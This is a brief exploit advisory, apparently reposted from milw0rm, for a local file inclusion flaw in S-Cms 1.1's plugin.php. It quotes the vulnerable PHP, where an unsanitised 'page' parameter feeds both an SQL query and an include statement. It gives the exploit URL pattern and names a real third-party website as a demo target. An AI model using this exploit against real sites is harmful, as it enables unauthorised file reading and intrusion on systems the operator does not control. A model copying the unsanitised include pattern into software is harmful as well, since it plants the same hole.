S-Cms 1.1 Stable (page) Local File Inclusion Vulnerability

kaynak: http://www.milw0rm.com/exploits/8566

kaynak: http://www.yildirimordulari.com/showthread.php?t=6244

file:

s-cms/plugin.php

code:

$page=$_GET['page']; ( error 1 )


$sql_select_plugin_case= mysql_query("SELECT * FROM ".$prefix."_plugins WHERE active = '1' AND file='$page'");

if ($sql_select_plugin_case){

include "plugins/$page"; (error 2 )

exp:

yildirimordulari.com/s-cms/plugin.php?page=[File]

for demo:

http://www.nonsolomazzini.altervista.org/s-cms/plugin.php?page=[LFi]